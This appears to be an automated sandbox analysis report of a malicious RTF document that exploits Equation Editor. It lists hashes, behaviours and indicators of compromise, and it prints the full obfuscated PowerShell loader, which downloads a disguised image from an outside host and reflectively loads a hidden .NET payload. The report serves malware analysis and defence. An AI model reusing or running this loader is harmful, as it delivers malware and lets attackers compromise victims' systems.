Analysis
-
max time kernel
53s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-10-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040.rtf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040.rtf
Resource
win10v2004-20241007-en
General
-
Target
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040.rtf
-
Size
97KB
-
MD5
f31ba8351265a427efdf3b2d24ec6fab
-
SHA1
0dc5a1c62306ff5e581a15408edc7ea15433a6d2
-
SHA256
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040
-
SHA512
1d70947a6fd849db0df28e79ed830a40355c569b4a89cf7e135deed8077f9089f5f4d3f61ea416537895204e24abf2fcc11406385e600d8410e349a1d06ffd20
-
SSDEEP
768:uUz5t/tJy06YV+K2IzBG3ZuE6dHscUgoFixYv9bqsRe:u4Zz4Y4zPJuLdHscUgiixa2
Malware Config
Extracted
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 3 2804 EQNEDT32.EXE 7 2388 powershell.exe 8 2388 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1516 powershell.exe 2388 powershell.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 880 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1516 powershell.exe 2388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 880 WINWORD.EXE 880 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEdescription pid process target process PID 2804 wrote to memory of 2572 2804 EQNEDT32.EXE WScript.exe PID 2804 wrote to memory of 2572 2804 EQNEDT32.EXE WScript.exe PID 2804 wrote to memory of 2572 2804 EQNEDT32.EXE WScript.exe PID 2804 wrote to memory of 2572 2804 EQNEDT32.EXE WScript.exe PID 2572 wrote to memory of 1516 2572 WScript.exe powershell.exe PID 2572 wrote to memory of 1516 2572 WScript.exe powershell.exe PID 2572 wrote to memory of 1516 2572 WScript.exe powershell.exe PID 2572 wrote to memory of 1516 2572 WScript.exe powershell.exe PID 1516 wrote to memory of 2388 1516 powershell.exe powershell.exe PID 1516 wrote to memory of 2388 1516 powershell.exe powershell.exe PID 1516 wrote to memory of 2388 1516 powershell.exe powershell.exe PID 1516 wrote to memory of 2388 1516 powershell.exe powershell.exe PID 880 wrote to memory of 2824 880 WINWORD.EXE splwow64.exe PID 880 wrote to memory of 2824 880 WINWORD.EXE splwow64.exe PID 880 wrote to memory of 2824 880 WINWORD.EXE splwow64.exe PID 880 wrote to memory of 2824 880 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2824
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRQc0hvbWVbNF0rJHBTSE9NRVszNF0rJ1gnKSAoICgnY0dmaW1hZ2VVcmwgPSBBekVodHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyLycrJ2l0ZW1zL2RldGFoJysnLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIEF6RTtjR2Z3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2NHZmltYWdlQnl0ZXMgPSBjR2Z3ZWJDbGllbnQuRG93bicrJ2xvYWREYXRhKGNHJysnZicrJ2ltYWcnKydlVXJsKTtjR2ZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhjR2ZpbWFnZUInKyd5dGUnKydzKTtjR2ZzdGFydEZsYWcgPSBBekU8PEJBU0U2NF9TVEFSVD4+QXpFO2NHZmVuZEZsYWcgPSBBekU8PEJBU0U2NF9FTkQ+PkF6RTtjR2ZzdGFydCcrJ0luZGV4ID0gY0dmaW1hZ2VUZXh0LkluZGV4T2YoY0dmc3RhcnRGbGFnKTtjR2ZlbmRJbmRleCA9IGNHZmltYWdlVGV4dC5JbmRleE9mKGNHZmVuZEZsYWcpO2NHZnN0YXJ0SW5kZXggLWdlIDAgLWFuZCBjR2ZlbmRJbmRleCAtZycrJ3QgY0dmc3RhcnRJbmRleDtjR2ZzdGFydEluZGV4ICs9IGNHZnMnKyd0YXJ0RmxhZy5MZW5ndGg7Y0dmYmFzZTY0TGVuZ3RoID0gY0cnKydmZW5kSW5kZXggLSBjR2ZzdGFydEluZGV4O2NHZmJhc2U2NENvbW1hbmQgPScrJyBjR2ZpbWFnZVRleHQuJysnU3Vic3RyaW5nKGNHZnN0YXJ0SW5kZXgsIGNHZmJhc2U2NExlbmd0aCk7Y0dmY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhjR2ZiYXNlNjQnKydDb21tYW5kKTtjR2Zsb2FkZWRBc3NlbScrJ2JseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoY0dmY29tbWFuZEJ5dGVzKTtjR2Z2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG8nKydkKEF6RVZBSUF6RSk7Y0dmdmFpTWV0aG9kLkludm9rZShjR2ZudWxsLCBAKEF6RXR4dC5HREZSUlcvMzQzMy8wNy41NjEuNDguMy8vOnB0dGhBekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RVJlJysnZ0FzbUF6RSwgQXpFZGVzYXRpdmFkbycrJ0F6RSwgQXpFZGVzYXRpdmFkb0F6RSkpJysnOycpLnJlcExBY0UoKFtDaGFyXTY1K1tDaGFyXTEyMitbQ2hhcl02OSksW1NUcmlOR11bQ2hhcl0zOSkucmVwTEFjRSgoW0NoYXJdOTkrW0NoYXJdNzErW0NoYXJdMTAyKSxbU1RyaU5HXVtDaGFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PsHome[4]+$pSHOME[34]+'X') ( ('cGfimageUrl = AzEhttps://ia600102.us.archive.org/32/'+'items/detah'+'-note-v_202410/DetahNote_V.jpg AzE;cGfwebClient = New-Object System.Net.WebClient;cGfimageBytes = cGfwebClient.Down'+'loadData(cG'+'f'+'imag'+'eUrl);cGfimageText = [System.Text.Encoding]::UTF8.GetString(cGfimageB'+'yte'+'s);cGfstartFlag = AzE<<BASE64_START>>AzE;cGfendFlag = AzE<<BASE64_END>>AzE;cGfstart'+'Index = cGfimageText.IndexOf(cGfstartFlag);cGfendIndex = cGfimageText.IndexOf(cGfendFlag);cGfstartIndex -ge 0 -and cGfendIndex -g'+'t cGfstartIndex;cGfstartIndex += cGfs'+'tartFlag.Length;cGfbase64Length = cG'+'fendIndex - cGfstartIndex;cGfbase64Command ='+' cGfimageText.'+'Substring(cGfstartIndex, cGfbase64Length);cGfcommandBytes = [System.Convert]::FromBase64String(cGfbase64'+'Command);cGfloadedAssem'+'bly = [System'+'.Reflection.Assembly]::Load(cGfcommandBytes);cGfvaiMethod = [dnlib.IO.Home].GetMetho'+'d(AzEVAIAzE);cGfvaiMethod.Invoke(cGfnull, @(AzEtxt.GDFRRW/3433/07.561.48.3//:ptthAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzERe'+'gAsmAzE, AzEdesativado'+'AzE, AzEdesativadoAzE))'+';').repLAcE(([Char]65+[Char]122+[Char]69),[STriNG][Char]39).repLAcE(([Char]99+[Char]71+[Char]102),[STriNG][Char]36))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57bc7264cffa74d4433ab0767b8a93b30
SHA1cd6128070703e3c06aff313b8d078dc804f8f534
SHA25647f865cbcd40b414ed75b88ba463f26795b78719a8bff0a614b98f2b4b9c9269
SHA5128d850063729783bb42115ca9ba70b1315ff7a4bc0d4fcd4413d35c9be0860bf9393b2763e5e9e291380007199f281dc3a009b895102a43504c98ee7f9e854dfd
-
Filesize
190KB
MD5b8c00ee73ed137a19e03920a03f80292
SHA1d414493aaa6f1c167409a997f73b0f52fb04c0fa
SHA2560cd60fbe4e65b7cbd036ee3e99507efa509970ab58c632bc49a4bcca2b05bd89
SHA512fa7a2767f17ef3a4a4bfec94f0d3db894ad7d658c582612da295d16e6c970a088a7ee7079798a599847fd49c957f011143e37a5828362c63c0953285839ba3c2